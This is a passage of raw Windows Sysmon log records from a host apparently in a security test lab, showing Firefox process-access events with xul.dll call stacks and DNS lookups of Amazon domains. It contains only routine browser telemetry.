Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 
Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000017419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.973{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla 
Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla 
Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea 10341000x800000000000000017415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.741{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9 10341000x800000000000000017414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.740{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla 
Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+3287301|C:\Program Files\Mozilla Firefox\xul.dll+328a801|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program 
Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla 
Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla 
Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:15.676{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla 
Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 22542200x800000000000000017408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.072{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu-retail-direct.amazon-adsystem.com052.95.118.235;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.071{59A5CD1D-945A-6005-3305-00000000A301}7052aax-eu.amazon.de0type: 5 aax-eu-retail-direct.amazon-adsystem.com;::ffff:52.95.118.235;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.038{59A5CD1D-945A-6005-3305-00000000A301}7052completion.amazon.co.uk9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.011{59A5CD1D-945A-6005-3305-00000000A301}7052completion.amazon.co.uk052.95.122.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:14.010{59A5CD1D-945A-6005-3305-00000000A301}7052completion.amazon.co.uk0::ffff:52.95.122.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:13.754{59A5CD1D-8E56-6005-2E00-00000000A301}246497.99.120.34.in-addr.arpa.0type: 12 97.99.120.34.bc.googleusercontent.com;C:\Windows\sysmon64.exe 
10341000x800000000000000017468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.745{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.745{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla 
Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.744{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla 
Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000017465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.692{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.692{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla 
Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla 